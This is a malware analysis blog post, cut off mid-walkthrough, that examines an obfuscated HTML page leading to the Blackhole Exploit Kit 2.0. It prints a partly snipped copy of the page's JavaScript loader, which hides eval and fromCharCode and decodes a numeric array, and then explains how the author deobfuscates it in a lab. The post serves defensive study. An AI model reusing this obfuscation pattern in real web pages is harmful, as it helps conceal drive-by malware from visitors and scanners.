Obfuscated iframe leads to Blackhole Exploit Kit 2.0

It's been awhile since I last posted. I've been super busy, but I had some time today. I found this a bit interesting so I thought I would share. I haven't looked at browser based malware much lately.

Let's get started. I was looking online at Malware Domain List and saw an html file that redirected the user to a Blackhole exploit so I figured why not.

I didn't have to get wild and spoof wget in order to get the sample to download.

Silvrback blog image

Here is some of the code. I've snipped some of the information as I don't want people reusing it, or sending other people there.

<html>  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"  
</head>  
<body>  
<h1>Please wait a moment. You will be forwarded...</h1><script>try{ebgserb++;}catch(snregrx){try{gnezrg|326}catch(ztbet){m=Math;ev=window[""+"e"+"val"];ff="fromCha";ff+="rCode";n="25&amp;&amp;26&amp;&amp;121&amp;&amp;119<b><span style="color: #ff0000;">[snip]</span>");h=2;s="";if(m)for(i=0;i-605!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)<b>ev(s);</b>}</script>;  
</body>  

I found a couple things to be interesting here.

ev=window[""+"e"+"val"];  
ff="fromCha";  
ff+="rCode";  
ev(s)  

The ev variable is using non-traditional ways for setting up eval(). It then uses ev(s) down below, which is setting eval(s)

You also see ff= breaking up "fromCha" and  "rCode", which should be simply "fromCharCode". fromCharCode is used to convert Unicode numbers into characters.

n is the number set, which you can see at the end of n they use ).split(&&) effectively splitting the numbers from && to give you 22,26,121,119, etc...

So now we get the idea that something might be up here. Let's take a look at it.

Silvrback blog image

Let's modify some code. First I want to format it correctly so I can see it a bit better. I had my Windows machine running in my lab so I just copied/pasted the messy code into Malzilla's decoder tab and hit, "Format Code".

Silvrback blog image

Then I copy/pasted it back into notepad on REMnux. Now let's manually change some things.

At first I can going to modify the ev variable from:

ev=window[""+"e"+"val"]; to ev=eval();  

Then I am going to change

ff="fromChar"; and ff+="rCode"; to ff="fromCharCode";  

We also need to ensure that ev(s); variable is on its own line.

I'm also going to add, debugger; under the first